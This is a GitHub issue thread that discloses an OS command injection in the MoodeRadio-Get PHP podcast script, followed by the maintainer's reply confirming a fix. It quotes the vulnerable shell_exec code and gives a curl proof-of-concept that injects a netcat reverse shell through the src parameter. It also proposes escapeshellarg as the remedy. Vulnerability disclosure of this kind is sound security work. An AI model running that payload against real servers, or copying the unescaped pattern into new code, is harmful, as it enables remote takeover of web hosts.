duracell80 / MoodeRadio-Get

Package Manager for Moode Audio Radio Stations
GNU General Public License v3.0
16 stars 2 forks source link

OS command injection vulnerability #7

Closed jasperla closed 3 years ago

jasperla commented 3 years ago

Hi,

It seems there's an OS command injection vulnerability through the $src parameter with podcasts.

In scripts/make-radio-manager/radio/sources/pod/index.php there is this construct:

 $src        = $_GET["src"];

 /* snip */

$runcmd = "python " . $apiPath . "/pod2m3u.py " . $src . " " . $name . " " . $items;
shell_exec($runcmd);

Note that $src is not escaped and as such can be abused to execute arbitrary commands on the OS as the user running the web server. For example to establish a reverse shell back to the attacker:

curl http://moode/radio/sources/pod?type=podcast&src=;nc -e /bin/bash 127.0.0.1 4444;&items=20&name=skynews&interlude=1

Sanitizing $src through escapeshellarg() would remedy this problem.

duracell80 commented 3 years ago

Thank you for the report, I've updated that and added a readme not on how to install the podcast library for python.

I did notice while poking at the podcaster that the image path change bug is also affecting this too. Will open a new ticket there.